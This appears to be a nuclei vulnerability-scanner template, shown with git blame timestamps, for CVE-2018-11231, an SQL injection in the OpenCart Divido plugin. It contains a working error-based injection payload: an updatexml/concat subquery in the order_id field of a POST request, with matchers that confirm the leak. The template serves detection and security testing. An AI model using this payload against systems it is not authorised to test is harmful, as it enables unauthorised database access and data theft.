nuclei-templates/http/cves/2018/CVE-2018-11231.yaml

55 lines
1.7 KiB
YAML
Raw Normal View History

2022-05-03 20:08:00 +00:00
id: CVE-2018-11231
info:
name: Opencart Divido - Sql Injection
2022-05-03 20:08:00 +00:00
author: ritikchaddha
severity: high
2022-06-20 16:17:09 +00:00
description: |
OpenCart Divido plugin is susceptible to SQL injection
2023-09-27 15:51:13 +00:00
impact: |
This vulnerability can lead to data theft, unauthorized access, and potential compromise of the entire Opencart Divido system.
2023-09-06 12:57:14 +00:00
remediation: |
Apply the official patch or upgrade to a version that includes the fix.
2022-05-03 20:08:00 +00:00
reference:
- https://web.archive.org/web/20220331072310/http://foreversong.cn/archives/1183
2022-05-07 11:09:37 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-11231
- http://foreversong.cn/archives/1183
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2018-11231
cwe-id: CWE-89
2023-07-11 19:49:27 +00:00
epss-score: 0.00903
epss-percentile: 0.80874
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: divido
product: divido
2023-09-06 12:57:14 +00:00
framework: opencart
2023-12-05 09:50:33 +00:00
tags: cve,cve2018,opencart,sqli,intrusive,divido
2022-06-30 03:48:40 +00:00
variables:
num: "999999999"
http:
2022-05-03 20:08:00 +00:00
- raw:
- |
POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1
Host: {{Hostname}}
2022-06-30 03:48:40 +00:00
{"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)"},"status":2}
2022-05-03 20:08:00 +00:00
host-redirects: true
2022-05-03 20:08:00 +00:00
max-redirects: 2
2023-07-11 19:49:27 +00:00
2022-05-03 20:08:00 +00:00
matchers-condition: and
matchers:
- type: word
2022-05-07 11:09:37 +00:00
part: body
2022-05-03 20:08:00 +00:00
words:
2023-07-11 19:49:27 +00:00
- "{{md5({{num}})}}"
2022-05-03 20:08:00 +00:00
- type: status
status:
- 200
# digest: 4a0a004730450220672fc02832aaf8d667e4a0858125dc6dea65e34b9b488b610c561ef47efa147f022100d675f5c2b812729f574e501dddc8e85db1a855c093583424954a41e193beecec:922c64590222798bb761d5b6d8e72950